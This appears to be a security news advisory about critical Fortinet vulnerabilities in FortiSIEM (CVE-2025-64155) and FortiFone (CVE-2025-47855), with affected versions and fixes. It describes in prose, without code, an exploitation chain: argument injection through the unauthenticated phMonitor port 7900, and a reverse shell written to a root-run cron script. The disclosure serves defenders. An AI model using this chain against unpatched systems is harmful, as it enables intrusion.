Fortinet has issued updates to resolve critical security vulnerabilities impacting its FortiSIEM and FortiFone products. These flaws could allow unauthenticated attackers to achieve unauthorized code execution or access device configurations.
FortiSIEM Vulnerability (CVE-2025-64155)
This operating system (OS) injection vulnerability, rated 9.4 on the CVSS scoring system, affects FortiSIEM's Super and Worker nodes. It enables an unauthenticated attacker to execute unauthorized code or commands via specially crafted TCP requests.
The flaw, discovered and reported by Horizon3.ai security researcher Zach Hanley, involves:
- An unauthenticated argument injection vulnerability that facilitates arbitrary file writes, leading to remote code execution as an admin user.
- A file overwrite privilege escalation vulnerability that grants root access, fully compromising the appliance.
Specifically, the issue resides in how FortiSIEM's phMonitor service (TCP port 7900), which is responsible for health monitoring and inter-node communication, processes incoming requests related to logging security events to Elasticsearch. This process can invoke a shell script with user-controlled parameters, allowing for argument injection via curl and enabling arbitrary file writes to disk in the context of the admin user. This file write capability can be used to achieve full system takeover by writing a reverse shell to "/opt/charting/redishb.sh," a file writable by an admin user and executed every minute by a cron job with root-level permissions. The phMonitor service exposes several command handlers that do not require authentication, simplifying invocation for an attacker with network access to port 7900.
Affected FortiSIEM Versions and Remediation:
- FortiSIEM 6.7.0 through 6.7.10: Migrate to a fixed release.
- FortiSIEM 7.0.0 through 7.0.4: Migrate to a fixed release.
- FortiSIEM 7.1.0 through 7.1.8: Upgrade to 7.1.9 or above.
- FortiSIEM 7.2.0 through 7.2.6: Upgrade to 7.2.7 or above.
- FortiSIEM 7.3.0 through 7.3.4: Upgrade to 7.3.5 or above.
- FortiSIEM 7.4.0: Upgrade to 7.4.1 or above.
- FortiSIEM 7.5 and FortiSIEM Cloud are not affected.
FortiFone Vulnerability (CVE-2025-47855)
Another critical security vulnerability, rated 9.3 on the CVSS scale, impacts FortiFone. This flaw could allow an unauthenticated attacker to obtain device configuration through a specially crafted HTTP(S) request to the Web Portal page.
Affected FortiFone Versions and Remediation:
- FortiFone 3.0.13 through 3.0.23: Upgrade to 3.0.24 or above.
- FortiFone 7.0.0 through 7.0.1: Upgrade to 7.0.2 or above.
- FortiFone 7.2 is not affected.
Recommendations
Users are advised to update to the latest versions of the affected products for optimal protection. As a workaround for CVE-2025-64155, Fortinet recommends limiting access to the phMonitor port (7900).